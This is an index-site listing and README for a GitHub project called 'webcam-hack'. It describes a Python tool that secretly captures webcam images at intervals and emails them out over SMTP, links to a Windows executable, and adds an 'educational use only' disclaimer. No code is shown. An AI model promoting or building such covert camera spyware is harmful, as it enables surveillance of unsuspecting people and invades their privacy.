An open API service indexing awesome lists of open source software.

https://github.com/rithingithub/webcam-hack

Python tool for hacking webcam windows or any OS
https://github.com/rithingithub/webcam-hack

hack opencv python webcam

Last synced: about 1 month ago
JSON representation

Python tool for hacking webcam windows or any OS

Awesome Lists containing this project

README

          

# Web Camera Hack
### Worked on Windows7 , Windows10 , Windows11, Linux etc
Python tool for hacking webcam.

Used libraries are ` OpenCV ` , ` emails ` , ` secure-smtplib ` and ` imghdr `. Libraries are listed in `requirements.txt` file.




## To install the executable file for windows , click the [download](https://github.com/Tina-2022/webcam-hack-rithingithub) button. You can also clone that repository and download manually.
### [OpenCv](https://pypi.org/project/opencv-python/) , [imghdr](https://docs.python.org/3/library/imghdr.html#module-imghdr) , [Emails](https://pypi.org/project/emails/) , [smtp-lib](https://github.com/graingert/secure-smtplib)


## Working
Capture the images in a specific time period and the captured image is saved as `pic.jpg`. The saved image is sended through a smtp server with the port number 465. Sending process is worked on the time delay of 10 sec. Sender email , reciever email and sender password need to predefined in the python program.

Dont use this for any illegal purpose. Use it for only educational puprose and testing purpose.If you do any illegal activity this account holder be never responsible for that.